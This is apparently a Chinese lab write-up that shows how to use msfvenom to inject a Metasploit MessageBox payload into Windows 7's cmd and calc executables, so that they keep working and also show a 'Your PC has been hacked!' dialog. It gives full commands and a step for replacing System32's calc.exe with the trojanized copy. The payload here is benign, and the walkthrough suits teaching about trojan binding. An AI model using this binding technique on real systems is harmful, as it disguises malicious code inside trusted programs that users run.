文章目录
实验内容
使用Kali的msfvenom
工具将一个打开messsagebox的木马程序
附加在目标主机(Windows 7 Professional x64)的系统程序
上。
实验过程
msfvenom参数
参考
:msfvenom参数总结
需要使用到的msfvenom参数如下:
-p <payload>
:设置使用的payload。-f <format>
:设置输出格式。-a <arch>
:设置payload使用的架构。--platform <platform>
:设置payload使用的平台。-o <path>
:将payload保存到指定的文件路径。-x <path>
:使用一个可执行文件当作模板。-k
:保留模板文件的功能,将payload作为线程注入。
查找messsagebox相关payload
使用如下命令查找messsagebox相关payload:
msfvenom -l payload |grep messagebox
查找到的与messsagebox相关的payload如下:
# windows/messagebox Spawns a dialog via MessageBox using a customi
# windows/x64/messagebox Spawn a dialog via MessageBox using a customiz
目标操作系统为64位,故选择 windows/x64/messagebox
。
查看payload参数
使用如下命令查看payload参数:
msfvenom -p windows/x64/messagebox --list-options
payload参数如下:
Options for payload/windows/x64/messagebox:
=========================
Name: Windows MessageBox x64
Module: payload/windows/x64/messagebox
Platform: Windows
Arch: x64
Needs Admin: No
Total size: 295
Rank: Normal
Provided by:
pasta <jaguinaga@infobytesec.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
ICON NO yes Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION)
TEXT Hello, from MSF! yes Messagebox Text
TITLE MessageBox yes Messagebox Title
Description:
Spawn a dialog via MessageBox using a customizable title, text &
icon
Advanced options for payload/windows/x64/messagebox:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion options for payload/windows/x64/messagebox:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
可以看到payload的arch为x64,platform为windows,payload的参数TEXT为"Hello, from MSF! "。
将打开messagebox的木马程序附加在正常程序上
将打开messagebox的木马程序附加在cmd程序上
使用以下命令使用msfvenom将打开messagebox的木马程序附加在cmd程序上:
msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Your PC has been hacked!" -x cmd_win7.exe -k -f exe -o cmd_win7_hacked.exe
将cmd_win7_hacked.exe程序拷贝到win7下运行:
将打开messagebox的木马程序附加在计算器程序上
使用以下命令使用msfvenom将打开messagebox的木马程序附加在计算器calc程序上:
msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Your PC has been hacked!" -x calc_win7.exe -k -f exe -o calc_win7_hacked.exe
calc.exe只能在C:/Windows/System32/下运行,并且文件名不能变。将calc_win7_hacked.exe程序拷贝到win7下目录C:/Windows/System32/下修改名字为calc.exe,然后运行: